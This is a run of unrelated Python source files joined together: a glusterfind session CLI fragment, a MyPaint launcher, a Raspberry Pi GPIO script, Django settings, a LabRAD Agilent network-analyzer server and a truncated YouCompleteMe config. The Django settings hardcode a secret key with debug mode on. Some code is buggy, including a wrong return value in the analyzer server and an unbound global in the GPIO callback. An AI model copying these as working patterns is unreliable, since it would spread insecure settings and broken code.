run_cmd_nodes("pre", args, start=start)
# Merger
if args.full:
cmd = ["sort", "-u"] + node_outfiles + ["-o", args.outfile]
execute(cmd,
exit_msg="Failed to merge output files "
"collected from nodes", logger=logger)
else:
# Read each Changelogs db and generate finaldb
create_file(args.outfile, exit_on_err=True, logger=logger)
outfilemerger = OutputMerger(args.outfile + ".db", node_outfiles)
with open(args.outfile, "a") as f:
for row in outfilemerger.get():
# Multiple paths in case of Hardlinks
paths = row[1].split(",")
for p in paths:
if p == "" or p.replace("%2F%2F","%2F") == \
row[2].replace("%2F%2F","%2F"):
continue
f.write("%s %s %s\n" % (row[0], p, row[2]))
try:
os.remove(args.outfile + ".db")
except (IOError, OSError):
pass
run_cmd_nodes("cleanup", args)
with open(status_file_pre, "w", buffering=0) as f:
f.write(str(endtime_to_update))
sys.stdout.write("Generated output file %s\n" % args.outfile)
def mode_post(session_dir, args):
"""
If pre session file exists, overwrite session file
If pre session file does not exists, return ERROR
"""
status_file = os.path.join(session_dir, args.volume, "status")
logger.debug("Post is called - Session: %s, Volume: %s"
% (args.session, args.volume))
status_file_pre = status_file + ".pre"
if os.path.exists(status_file_pre):
run_cmd_nodes("post", args)
os.rename(status_file_pre, status_file)
sys.stdout.write("Session %s with volume %s updated\n" %
(args.session, args.volume))
sys.exit(0)
else:
fail("Pre script is not run", logger=logger)
def mode_delete(session_dir, args):
run_cmd_nodes("delete", args)
shutil.rmtree(os.path.join(session_dir, args.volume),
onerror=handle_rm_error)
sys.stdout.write("Session %s with volume %s deleted\n" %
(args.session, args.volume))
# If the session contains only this volume, then cleanup the
# session directory. If a session contains multiple volumes
# then os.rmdir will fail with ENOTEMPTY
try:
os.rmdir(session_dir)
except OSError as e:
if not e.errno == ENOTEMPTY:
logger.warn("Failed to delete session directory: %s" % e)
def mode_list(session_dir, args):
"""
List available sessions to stdout, if session name is set
only list that session.
"""
if args.session:
if not os.path.exists(os.path.join(session_dir, args.session)):
fail("Invalid Session", logger=logger)
sessions = [args.session]
else:
sessions = []
for d in os.listdir(session_dir):
if d != ".keys":
sessions.append(d)
output = []
for session in sessions:
# Session Volume Last Processed
volnames = os.listdir(os.path.join(session_dir, session))
for volname in volnames:
if args.volume and args.volume != volname:
continue
status_file = os.path.join(session_dir, session, volname, "status")
last_processed = None
try:
with open(status_file) as f:
last_processed = f.read().strip()
except (OSError, IOError) as e:
if e.errno == ENOENT:
continue
else:
raise
output.append((session, volname, last_processed))
if output:
sys.stdout.write("%s %s %s\n" % ("SESSION".ljust(25),
"VOLUME".ljust(25),
"SESSION TIME".ljust(25)))
sys.stdout.write("-"*75)
sys.stdout.write("\n")
for session, volname, last_processed in output:
sess_time = 'Session Corrupted'
if last_processed:
try:
sess_time = human_time(last_processed)
except TypeError:
sess_time = 'Session Corrupted'
sys.stdout.write("%s %s %s\n" % (session.ljust(25),
volname.ljust(25),
sess_time.ljust(25)))
if not output:
if args.session or args.volume:
fail("Invalid Session", logger=logger)
else:
sys.stdout.write("No sessions found.\n")
def main():
args = _get_args()
mkdirp(conf.get_opt("session_dir"), exit_on_err=True)
if args.mode == "list":
session_dir = conf.get_opt("session_dir")
else:
session_dir = os.path.join(conf.get_opt("session_dir"),
args.session)
if not os.path.exists(session_dir) and args.mode not in ["create", "list"]:
fail("Invalid session %s" % args.session)
vol_dir = os.path.join(session_dir, args.volume)
if not os.path.exists(vol_dir) and args.mode not in ["create", "list"]:
fail("Session %s not created with volume %s" %
(args.session, args.volume))
mkdirp(os.path.join(conf.get_opt("log_dir"), args.session, args.volume),
exit_on_err=True)
log_file = os.path.join(conf.get_opt("log_dir"),
args.session,
args.volume,
"cli.log")
setup_logger(logger, log_file, args.debug)
# globals() will have all the functions already defined.
# mode_<args.mode> will be the function name to be called
globals()["mode_" + args.mode](session_dir, args)
|
"""Platform-dependent setup, and program launch.
This script does all the platform dependent stuff.
Its main task is to figure out where MyPaint's python modules are,
and set up paths for i18n message catalogs.
It then passes control to gui.main.main() for command line launching.
"""
import sys
import os
import re
import logging
logger = logging.getLogger('mypaint')
class ColorFormatter (logging.Formatter):
"""Minimal ANSI formatter, for use with non-Windows console logging."""
# ANSI control sequences for various things
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
FG = 30
BG = 40
LEVELCOL = {
"DEBUG": "\033[%02dm" % (FG+BLUE,),
"INFO": "\033[%02dm" % (FG+GREEN,),
"WARNING": "\033[%02dm" % (FG+YELLOW,),
"ERROR": "\033[%02dm" % (FG+RED,),
"CRITICAL": "\033[%02d;%02dm" % (FG+RED, BG+BLACK),
}
BOLD = "\033[01m"
BOLDOFF = "\033[22m"
ITALIC = "\033[03m"
ITALICOFF = "\033[23m"
UNDERLINE = "\033[04m"
UNDERLINEOFF = "\033[24m"
RESET = "\033[0m"
# Replace tokens in message format strings to highlight interpolations
REPLACE_BOLD = lambda m: (ColorFormatter.BOLD +
m.group(0) +
ColorFormatter.BOLDOFF)
REPLACE_UNDERLINE = lambda m: (ColorFormatter.UNDERLINE +
m.group(0) +
ColorFormatter.UNDERLINEOFF)
TOKEN_FORMATTING = [
(re.compile(r'%r'), REPLACE_BOLD),
(re.compile(r'%s'), REPLACE_BOLD),
(re.compile(r'%\+?[0-9.]*d'), REPLACE_BOLD),
(re.compile(r'%\+?[0-9.]*f'), REPLACE_BOLD),
]
def format(self, record):
record = logging.makeLogRecord(record.__dict__)
msg = record.msg
for token_re, repl in self.TOKEN_FORMATTING:
msg = token_re.sub(repl, msg)
record.msg = msg
record.reset = self.RESET
record.bold = self.BOLD
record.boldOff = self.BOLDOFF
record.italic = self.ITALIC
record.italicOff = self.ITALICOFF
record.underline = self.UNDERLINE
record.underlineOff = self.UNDERLINEOFF
record.levelCol = ""
if record.levelname in self.LEVELCOL:
record.levelCol = self.LEVELCOL[record.levelname]
return super(ColorFormatter, self).format(record)
def win32_unicode_argv():
# fix for https://gna.org/bugs/?17739
# code mostly comes from http://code.activestate.com/recipes/572200/
"""Uses shell32.GetCommandLineArgvW to get sys.argv as a list of Unicode
strings.
Versions 2.x of Python don't support Unicode in sys.argv on
Windows, with the underlying Windows API instead replacing multi-byte
characters with '?'.
"""
try:
from ctypes import POINTER, byref, cdll, c_int, windll
from ctypes.wintypes import LPCWSTR, LPWSTR
GetCommandLineW = cdll.kernel32.GetCommandLineW
GetCommandLineW.argtypes = []
GetCommandLineW.restype = LPCWSTR
CommandLineToArgvW = windll.shell32.CommandLineToArgvW
CommandLineToArgvW.argtypes = [LPCWSTR, POINTER(c_int)]
CommandLineToArgvW.restype = POINTER(LPWSTR)
cmd = GetCommandLineW()
argc = c_int(0)
argv = CommandLineToArgvW(cmd, byref(argc))
if argc.value > 0:
# Remove Python executable if present
if argc.value - len(sys.argv) == 1:
start = 1
else:
start = 0
return [argv[i] for i in xrange(start, argc.value)]
except:
logger.exception(
"Specialized Win32 argument handling failed. Please "
"help us determine if this code is still needed, "
"and submit patches if it's not."
)
logger.warning("Falling back to POSIX-style argument handling")
return [s.decode(sys.getfilesystemencoding()) for s in sys.argv]
def get_paths():
join = os.path.join
# Convert sys.argv to a list of unicode objects
# (actually converting sys.argv confuses gtk, thus we add a new variable)
if sys.platform == 'win32':
sys.argv_unicode = win32_unicode_argv()
else:
sys.argv_unicode = [s.decode(sys.getfilesystemencoding())
for s in sys.argv]
# Script and its location, in canonical absolute form
scriptfile = os.path.realpath(sys.argv_unicode[0])
scriptfile = os.path.abspath(os.path.normpath(scriptfile))
scriptdir = os.path.dirname(scriptfile)
assert isinstance(scriptfile, unicode)
assert isinstance(scriptdir, unicode)
# Determine the installation's directory layout.
# Assume a conventional POSIX-style directory structure first,
# where the launch script resides in $prefix/bin/.
dir_install = scriptdir
prefix = os.path.dirname(dir_install)
assert isinstance(prefix, unicode)
libpath = join(prefix, 'share', 'mypaint')
localepath = join(prefix, 'share', 'locale')
localepath_brushlib = localepath
iconspath = join(prefix, 'share', 'icons')
if os.path.exists(libpath) and os.path.exists(iconspath):
# This is a normal POSIX-like installation.
# The Windows standalone distribution works like this too.
libpath_compiled = join(prefix, 'lib', 'mypaint') # or lib64?
sys.path.insert(0, libpath)
sys.path.insert(0, libpath_compiled)
sys.path.insert(0, join(prefix, 'share')) # for libmypaint
logger.info("Installation layout: conventional POSIX-like structure "
"with prefix %r",
prefix)
elif all(map(os.path.exists, ['brushlib', 'desktop', 'gui', 'lib'])):
# Testing from within the source tree.
prefix = None
libpath = u'.'
iconspath = u'desktop/icons'
localepath = 'po'
localepath_brushlib = 'brushlib/po'
logger.info("Installation layout: not installed, "
"testing from within the source tree")
elif sys.platform == 'win32':
prefix = None
# This is py2exe point of view, all executables in root of
# installdir.
# XXX: are py2exe builds still relevant? The 1.2.0-beta Windows
# installers are kitchen sink affairs.
libpath = os.path.realpath(scriptdir)
sys.path.insert(0, libpath)
sys.path.insert(0, join(prefix, 'share')) # for libmypaint
localepath = join(libpath, 'share', 'locale')
localepath_brushlib = localepath
iconspath = join(libpath, 'share', 'icons')
logger.info("Installation layout: Windows fallback, assuming py2exe")
else:
logger.critical("Installation layout: unknown!")
raise RuntimeError("Unknown install type; could not determine paths")
assert isinstance(libpath, unicode)
datapath = libpath
if not os.path.isdir(join(datapath, 'brushes')):
logger.critical('Default brush collection not found!')
logger.critical('It should have been here: %r', datapath)
sys.exit(1)
# Old style config file and user data locations.
# Return None if using XDG will be correct.
if sys.platform == 'win32':
old_confpath = None
else:
from lib import fileutils
homepath = fileutils.expanduser_unicode(u'~')
old_confpath = join(homepath, '.mypaint/')
if old_confpath:
if not os.path.isdir(old_confpath):
old_confpath = None
else:
logger.info("There is an old-style configuration area in %r",
old_confpath)
logger.info("Its contents can be migrated to $XDG_CONFIG_HOME "
"and $XDG_DATA_HOME if you wish.")
logger.info("See the XDG Base Directory Specification for info.")
assert isinstance(old_confpath, unicode) or old_confpath is None
assert isinstance(datapath, unicode)
assert isinstance(iconspath, unicode)
return datapath, iconspath, old_confpath, localepath, localepath_brushlib
def init_gettext(localepath, localepath_brushlib):
"""Intialize locales and gettext.
This must be done before importing any translated python modules
(to get global strings translated, especially brushsettings.py).
"""
import gettext
import locale
import lib.i18n
# Required in Windows for the "Region and Language" settings
# to take effect.
lib.i18n.set_i18n_envvars()
lib.i18n.fixup_i18n_envvars()
# Internationalization
# Source of many a problem down the line, so lotsa debugging here.
logger.debug("localepath: %r", localepath)
logger.debug("localepath_brushlib: %r", localepath_brushlib)
logger.debug("getdefaultlocale(): %r", locale.getdefaultlocale())
# Set the user's preferred locale.
# https://docs.python.org/2/library/locale.html
# Required in Windows for the "Region and Language" settings
# to take effect.
try:
setlocale_result = locale.setlocale(locale.LC_ALL, '')
except locale.Error:
logger.exception("setlocale(LC_ALL, '') failed")
else:
logger.debug("setlocale(LC_ALL, ''): %r", setlocale_result)
# More debugging: show the state after setlocale().
logger.debug(
"getpreferredencoding(): %r",
locale.getpreferredencoding(do_setlocale=False),
)
locale_categories = [
s for s in dir(locale)
if s.startswith("LC_") and s != "LC_ALL"
]
for category in sorted(locale_categories):
logger.debug(
"getlocale(%s): %r",
category,
locale.getlocale(getattr(locale, category)),
)
# Low-level bindtextdomain with paths.
# This is still required to hook GtkBuilder up with translated
# strings; the gettext() way doesn't cut it for external stuff
# yanked in over GI.
# https://bugzilla.gnome.org/show_bug.cgi?id=574520#c26
bindtextdomain = None
bind_textdomain_codeset = None
textdomain = None
# Try the POSIX/Linux way first.
try:
bindtextdomain = locale.bindtextdomain
bind_textdomain_codeset = locale.bind_textdomain_codeset
textdomain = locale.textdomain
except AttributeError:
logger.warning(
"No bindtextdomain builtins found in module 'locale'."
)
logger.info(
"Trying platform-specific fallback hacks to find "
"bindtextdomain funcs.",
)
# Windows Python binaries tend not to expose bindtextdomain and
# its buddies anywhere they can be called.
if sys.platform == 'win32':
libintl = None
import ctypes
for libname in [
'libintl-8.dll', # native for MSYS2'sMINGW32
'libintl.dll', # no known cases, but a potential fallback
'intl.dll', # some old recipes off the internet
]:
try:
libintl = ctypes.cdll.LoadLibrary(libname)
bindtextdomain = libintl.bindtextdomain
bindtextdomain.argtypes = (
ctypes.c_char_p,
ctypes.c_char_p,
)
bindtextdomain.restype = ctypes.c_char_p
bind_textdomain_codeset = libintl.bind_textdomain_codeset
bind_textdomain_codeset.argtypes = (
ctypes.c_char_p,
ctypes.c_char_p,
)
bind_textdomain_codeset.restype = ctypes.c_char_p
textdomain = libintl.textdomain
textdomain.argtypes = (
ctypes.c_char_p,
)
textdomain.restype = ctypes.c_char_p
except:
logger.exception(
"Windows: attempt to load bindtextdomain funcs "
"from %r failed (ctypes)",
libname,
)
else:
logger.info(
"Windows: found working bindtextdomain funcs "
"in %r (ctypes)",
libname,
)
break
else:
logger.error(
"No platform-specific fallback for locating bindtextdomain "
"is known for %r",
sys.platform,
)
# Bind text domains, i.e. tell libintl+GtkBuilder and Python's where
# to find message catalogs containing translations.
textdomains = [
("mypaint", localepath),
("libmypaint", localepath_brushlib),
]
defaultdom = "mypaint"
codeset = "UTF-8"
for dom, path in textdomains:
# Some people choose not to install any translation files.
if not os.path.isdir(path):
logger.warning(
"No translations for %s. Missing locale dir %r.",
dom, path,
)
continue
# Only call the C library gettext setup funcs if there's a
# complete set from the same source.
# Required for translatable strings in GtkBuilder XML
# to be translated.
if bindtextdomain and bind_textdomain_codeset and textdomain:
assert os.path.exists(path)
assert os.path.isdir(path)
p = bindtextdomain(dom, path)
c = bind_textdomain_codeset(dom, codeset)
logger.debug("C bindtextdomain(%r, %r): %r", dom, path, p)
logger.debug(
"C bind_textdomain_codeset(%r, %r): %r",
dom, codeset, c,
)
# Call the implementations in Python's standard gettext module
# too. This has proper cross-platform support, but it only
# initializes the native Python "gettext" module.
# Required for marked strings in Python source to be translated.
# See http://docs.python.org/release/2.7/library/locale.html
p = gettext.bindtextdomain(dom, path)
c = gettext.bind_textdomain_codeset(dom, codeset)
logger.debug("Python bindtextdomain(%r, %r): %r", dom, path, p)
logger.debug(
"Python bind_textdomain_codeset(%r, %r): %r",
dom, codeset, c,
)
if bindtextdomain and bind_textdomain_codeset and textdomain:
d = textdomain(defaultdom)
logger.debug("C textdomain(%r): %r", defaultdom, d)
d = gettext.textdomain(defaultdom)
logger.debug("Python textdomain(%r): %r", defaultdom, d)
if __name__ == '__main__':
# Console logging
log_format = "%(levelname)s: %(name)s: %(message)s"
if sys.platform == 'win32':
# Windows doesn't understand ANSI by default.
console_handler = logging.StreamHandler(stream=sys.stderr)
console_formatter = logging.Formatter(log_format)
else:
# Assume POSIX.
# Clone stderr so that later reassignment of sys.stderr won't affect
# logger if --logfile is used.
stderr_fd = os.dup(sys.stderr.fileno())
stderr_fp = os.fdopen(stderr_fd, 'ab', 0)
# Pretty colors.
console_handler = logging.StreamHandler(stream=stderr_fp)
if stderr_fp.isatty():
log_format = (
"%(levelCol)s%(levelname)s: "
"%(bold)s%(name)s%(reset)s%(levelCol)s: "
"%(message)s%(reset)s")
console_formatter = ColorFormatter(log_format)
else:
console_formatter = logging.Formatter(log_format)
console_handler.setFormatter(console_formatter)
logging_level = logging.INFO
if os.environ.get("MYPAINT_DEBUG", False):
logging_level = logging.DEBUG
root_logger = logging.getLogger(None)
root_logger.addHandler(console_handler)
root_logger.setLevel(logging_level)
if logging_level == logging.DEBUG:
logger.info("Debugging output enabled via MYPAINT_DEBUG")
# Path determination
datapath, iconspath, old_confpath, localepath, localepath_brushlib \
= get_paths()
logger.debug('datapath: %r', datapath)
logger.debug('iconspath: %r', iconspath)
logger.debug('old_confpath: %r', old_confpath)
logger.debug('localepath: %r', localepath)
logger.debug('localepath_brushlib: %r', localepath_brushlib)
# Locale setting
init_gettext(localepath, localepath_brushlib)
# Allow an override version string to be burned in during build. Comes
# from an active repository's git information and build timestamp, or
# the release_info file from a tarball release.
try:
version = MYPAINT_VERSION_CEREMONIAL
except NameError:
version = None
# Start the app.
from gui import main
main.main(datapath, iconspath, old_confpath, version=version)
|
import RPi.GPIO as GPIO
import time
pin = 12
time0 = 0
def actualizar(pinx):
time1 = time.time()
print("DTime = " + str(time1-time0))
time0 = time1
if __name__ == "__main__":
GPIO.setmode(GPIO.BOARD)
GPIO.setup(pin, GPIO.IN) #pull_up_down=GPIO.PUD_DOWN
GPIO.add_event_detect(pin, GPIO.FALLING, callback=actualizar) # add bounce time ?
raw_input("")
|
"""
Django settings for apartment_manage project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
SECRET_KEY = 'v!wnqkg5c7!f#12^^)x6m!44ph@o7p7fl9hz-s+_@nyu8_#^+0'
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'apartment_manage.urls'
WSGI_APPLICATION = 'apartment_manage.wsgi.application'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
|
ENVS = [
{
"name" : "DEV",
"label" : "DEV",
"id" : 2,
"prior" : "Library",
"created" : "12-12-2012",
},
{
"name" : "Library",
"label" : "Library",
"id" : 1,
"prior" : "None",
"created" : "12-12-2012",
}
]
|
"""
[info]
name = Agilent N5230A Network Analyzer
version = 0.10.3
description = Four channel 5230A PNA-L network analyzer server
[startup]
cmdline = %PYTHON% %FILE%
timeout = 20
[shutdown]
message = 987654321
timeout = 5
"""
import os
if __file__ in [f for f in os.listdir('.') if os.path.isfile(f)]:
# This is executed when the script is loaded by the labradnode.
SCRIPT_PATH = os.path.dirname(os.getcwd())
else:
# This is executed if the script is started by clicking or
# from a command line.
SCRIPT_PATH = os.path.dirname(__file__)
LABRAD_PATH = os.path.join(SCRIPT_PATH.rsplit('LabRAD', 1)[0])
import sys
if LABRAD_PATH not in sys.path:
sys.path.append(LABRAD_PATH)
import numpy
from labrad.gpib import GPIBManagedServer, GPIBDeviceWrapper
from labrad.server import setting, returnValue
import labrad.units as units
from LabRAD.Servers.Utilities.general import sleep
class AgilentN5230AServer(GPIBManagedServer):
name = 'Agilent N5230A Network Analyzer'
deviceName = 'AGILENT TECHNOLOGIES N5230A'
deviceWrapper = GPIBDeviceWrapper
@setting(600, 'Preset')
def preset(self, c):
"""Performs preset on network analyzer."""
dev = self.selectedDevice(c)
yield dev.write('SYSTem:PRESet')
yield sleep(0.1)
@setting(601, 'Power Output', pow='b', returns='b')
def power_output(self, c, pow=None):
"""Turn output power on or off, or query state."""
dev = self.selectedDevice(c)
if pow is None:
resp = yield dev.query('OUTP?')
pow = bool(int(resp))
else:
if pow:
yield dev.write('OUTP ON')
else:
yield dev.write('OUTP OFF')
returnValue(pow)
@setting(602, 'Center Frequency', cfreq='v[Hz]', returns='v[Hz]')
def center_frequency(self, c, cfreq=None):
"""Set or get the sweep center frequency."""
dev = self.selectedDevice(c)
if cfreq is None:
resp = yield dev.query('SENSe1:FREQuency:CENTer?')
cfreq = float(resp) * units.Hz
else:
yield dev.write('SENSe1:FREQuency:CENTer %i' %cfreq['Hz'])
returnValue(cfreq)
@setting(603, 'Frequency Span', span='v[Hz]', returns='v[Hz]')
def frequency_span(self, c, span=None):
"""Set or get the sweep center frequency."""
dev = self.selectedDevice(c)
if span is None:
resp = yield dev.query('SENSe1:FREQuency:SPAN')
span = float(resp) * units.Hz
else:
yield dev.write('SENSe1:FREQuency:SPAN %i' %span['Hz'])
returnValue(cfreq)
@setting(604, 'Start Frequency', start='v[Hz]', returns='v[Hz]')
def start_frequency(self, c, start=None):
"""Set or get sweep start frequency."""
dev = self.selectedDevice(c)
if start is None:
resp = yield dev.query('SENSe1:FREQuency:STARt?')
start = float(resp) * units.Hz
else:
yield dev.write('SENSe1:FREQuency:STARt %i' %start['Hz'])
returnValue(start)
@setting(605, 'Stop Frequency', stop='v[Hz]', returns='v[Hz]')
def stop_frequency(self, c, stop=None):
"""Set or get sweep stop frequency."""
dev = self.selectedDevice(c)
if stop is None:
resp = yield dev.query('SENSe1:FREQuency:STOP?')
stop = float(resp) * units.Hz
else:
yield dev.write('SENSe1:FREQuency:STOP %i' %stop['Hz'])
returnValue(stop)
@setting(606, 'Sweep Type', stype='s', returns='s')
def sweep_type(self, c, stype=None):
"""
Set or get the frequency sweep type. 'LIN' - for linear,
'CW' - for single frequency.
"""
dev = self.selectedDevice(c)
if stype is None:
stype = yield dev.query('SENSe1:SWEep:TYPE?')
else:
if (stype.upper() != 'CW') and (stype.upper() != 'LIN'):
raise ValueError('Unknown sweep type: ' + str(stype) +
'. Please use "LIN" or "CW".')
else:
yield dev.write('SENSe1:SWEep:TYPE ' + stype)
returnValue(stype)
@setting(607, 'IF Bandwidth', bw='v[Hz]', returns='v[Hz]')
def if_bandwidth(self, c, bw=None):
"""Set or get the IF bandwidth."""
dev = self.selectedDevice(c)
if bw is None:
resp = yield dev.query('SENSe1:BANDwidth?')
bw = float(resp) * units.Hz
else:
yield dev.write('SENSe1:BANDwidth %i' %bw['Hz'])
returnValue(type)
@setting(608, 'Average Mode', avg='b', returns='b')
def average_mode(self, c, avg=None):
"""Turn sweep averaging on or off, or query state."""
dev = self.selectedDevice(c)
if avg is None:
resp = yield dev.query('SENSe1:AVERage?')
avg = bool(int(resp))
else:
if avg:
yield dev.write('SENSe1:AVERage ON')
else:
yield dev.write('SENSe1:AVERage OFF')
returnValue(avg)
@setting(609, 'Restart Averaging')
def restart_averaging(self, c):
"""Clears and restarts trace averaging on the current sweep."""
dev = self.selectedDevice(c)
yield dev.write('SENSe1:AVERage:CLEar')
@setting(610, 'Average Points', count='w', returns='w')
def average_points(self, c, count=None):
"""
Set or get the number of measurements to combine for an average.
"""
dev = self.selectedDevice(c)
if count is None:
resp = yield dev.query('SENSe1:AVER:COUN?')
count = int(float(resp))
else:
yield dev.write('SENSe1:AVER:COUN %d' %count)
returnValue(count)
@setting(611, 'Source Power', pow='v[dBm]', returns='v[dBm]')
def source_power(self, c, pow=None):
"""Set or get source RF power."""
dev = self.selectedDevice(c)
if pow is None:
resp = yield dev.query('SOURce:POWer?')
pow = float(resp) * units.dBm
else:
yield dev.write('SOURce:POW1 %f' %pow['dBm'])
returnValue(pow)
@setting(612, 'Get Sweep Time', returns='v[s]')
def get_sweep_time(self, c):
"""Get the time to complete a sweep."""
dev = self.selectedDevice(c)
resp = yield dev.query('SENSe1:SWEep:TIME?')
swpTime = float(resp) * units.s
returnValue(swpTime)
@setting(613, 'Sweep Points', points='w', returns='w')
def sweep_points(self, c, points=None):
"""Set or get the number of points in the sweep."""
dev = self.selectedDevice(c)
if points is None:
resp = yield dev.query('SENSe1:SWEep:POINts?')
points = int(float(resp))
else:
yield dev.write('SENSe1:SWEep:POINts %i'%points)
returnValue(points)
@setting(614, 'Measurement Setup', meas='s')
def measurement_setup(self, c, meas='S21'):
"""
Set the measurement parameters. Use a string of the form Sxx
(S21, S11...) for the measurement type.
"""
if meas not in ('S11', 'S12', 'S13', 'S14', 'S21', 'S22', 'S23',
'S24', 'S31', 'S32', 'S33', 'S34', 'S41', 'S42', 'S43',
'S44'):
raise ValueError('Illegal measurment definition: %s'
%str(meas))
dev = self.selectedDevice(c)
yield dev.write('CALC:PAR:DEL:ALL')
yield dev.write('DISPlay:WINDow1:STATE ON')
yield dev.write('CALCulate:PARameter:DEFine:EXT "MyMeas",%s'
%meas)
yield dev.write('DISPlay:WINDow1:TRACe1:FEED "MyMeas"')
yield dev.write('CALC:PAR:SEL "MyMeas"')
yield dev.write('SENSe1:SWEep:TIME:AUTO ON')
yield dev.write('TRIG:SOUR IMM')
@setting(615, 'Get Trace', returns='*v[dB]')
def get_trace(self, c):
"""Get the active trace from the network analyzer."""
dev = self.selectedDevice(c)
meas = yield dev.query('SYST:ACT:MEAS?')
yield dev.write('CALC:PAR:SEL %s' %meas)
yield dev.write('FORM ASCii,0')
avgMode = yield self.average_mode(c)
if avgMode:
avgCount = yield self.average_points(c)
yield self.restart_averaging(c)
yield dev.write('SENS:SWE:GRO:COUN %i' %avgCount)
yield dev.write('SENS:SWE:MODE GRO')
else:
yield dev.write('ABORT;:INITIATE:IMMEDIATE')
# Wait for the measurement to finish.
yield dev.query('*OPC?')
ascii_data = yield dev.query('CALC1:DATA? FDATA')
data = numpy.array([x for x in ascii_data.split(',')],
dtype=float)
returnValue(data.astype(float))
@setting(616, 'Get S2P', ports='(w, w)', returns=('*(v[Hz], ' +
'v[dB], v[deg], v[dB], v[deg], v[dB], v[deg], v[dB], ' +
'v[deg])'))
def get_s2p(self, c, ports=(1, 2)):
"""Get the scattering parameters from the network analyzer
in the S2P format. The input parameter should be a tuple that
specifies two network analyzer ports, e.g. (1, 2).
Available ports are 1, 2, 3, and 4. The data are returned as
a list of tuples in the following format:
*(frequency,
S[ports[0],ports[0]], Phase[ports[0], ports[0]],
S[ports[1],ports[0]], Phase[ports[1], ports[0]],
S[ports[0],ports[1]], Phase[ports[0], ports[1]],
S[ports[1],ports[1]], Phase[ports[0], ports[1]]).
"""
if len(ports) != 2:
raise Exception("Two and only two ports should be " +
"specified.")
for port in ports:
if port < 1 or port > 4:
raise Exception("Port number could be only '1', '2', " +
"'3', or '4'.")
if ports[0] == ports[1]:
raise Exception("Port numbers should not be equal.")
dev = self.selectedDevice(c)
meas = yield dev.query('SYST:ACT:MEAS?')
yield dev.write('CALC:PAR:SEL %s' %meas)
yield dev.write('FORM ASCii,0')
avgMode = yield self.average_mode(c)
if avgMode:
avgCount = yield self.average_points(c)
yield self.restart_averaging(c)
yield dev.write('SENS:SWE:GRO:COUN %i' %avgCount)
yield dev.write('SENS:SWE:MODE GRO')
else:
yield dev.write('ABORT;:INITIATE:IMMEDIATE')
# Wait for the measurement to finish.
yield dev.query('*OPC?')
ascii_data = yield dev.query("CALC:DATA:SNP:PORT? '%i, %i'"
%ports)
data = numpy.array([x for x in ascii_data.split(',')],
dtype=float)
length = numpy.size(data) / 9
data = data.reshape(9, length)
data = [(data[0, k] * units.Hz,
data[1, k] * units.dB, data[2, k] * units.deg,
data[3, k] * units.dB, data[4, k] * units.deg,
data[5, k] * units.dB, data[6, k] * units.deg,
data[7, k] * units.dB, data[8, k] * units.deg)
for k in range(length)]
returnValue(data)
@setting(599, 'Initialize')
def initialize(self, c):
"""Initialize the network analyzer."""
dev = self.selectedDevice(c)
yield self.preset(c)
__server__ = AgilentN5230AServer()
if __name__ == '__main__':
from labrad import util
util.runServer(__server__)
|
class Knowledge:
def __init__(self):
self.knowings = {}
def add(self, what, key, value):
if what not in self.knowings:
self.knowings[what] = {}
self.knowings[what][key] = value
def remove(self, what, key):
if what in self.knowings:
del self.knowings[what][key]
def get(self, what, key=None):
if not key:
return self.knowings.get(what, {})
else:
if what not in self.knowings:
return None
# Return None if value does not exist.
return self.knowings[what].get(key)
def __str__(self):
s = "<know: " + str(self.knowings)
return s + ">\n"
|
import os
import ycm_core
flags = [
'-Wall',
'-Wextra',
'-Werror',
'-Wc++98-compat',
'-Wno-long-long',
'-Wno-variadic-macros',
'-fexceptions',
'-DNDEBUG',
'''
'-DUSE_CLANG_COMPLETER',
'''
'-std=c++11',
'-x',
'c++',
'-isystem',
'../BoostParts',
'-isystem',
'/System/Library/Frameworks/Python.framework/Headers',
'-isystem',
'../llvm/include',
'-isystem',
'../llvm/tools/clang/include',
'-I',
'.',
'-I',
'./ClangCompleter',
'-isystem',
'./tests/gmock/gtest',
'-isystem',
'./tests/gmock/gtest/include',
'-isystem',
'./tests/gmock',
'-isystem',
'./tests/gmock/include',
'-I',
'/home/shenyunhang/Documents/caffe/include/'
]
compilation_database_folder = ''
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
SOURCE_EXTENSIONS = [ '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return list( flags )
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join( working_directory, flag )
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join( working_directory, path )
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def IsHeaderFile( filename ):
extension = os.path.splitext( filename )[ 1 ]
return extension in [ '.h', '.hxx', '.hpp', '.hh' ]
def GetCompilationInfoForFile( filename ):
# The compilation_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile( filename ):
basename = os.path.splitext( filename )[ 0 ]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists( replacement_file ):
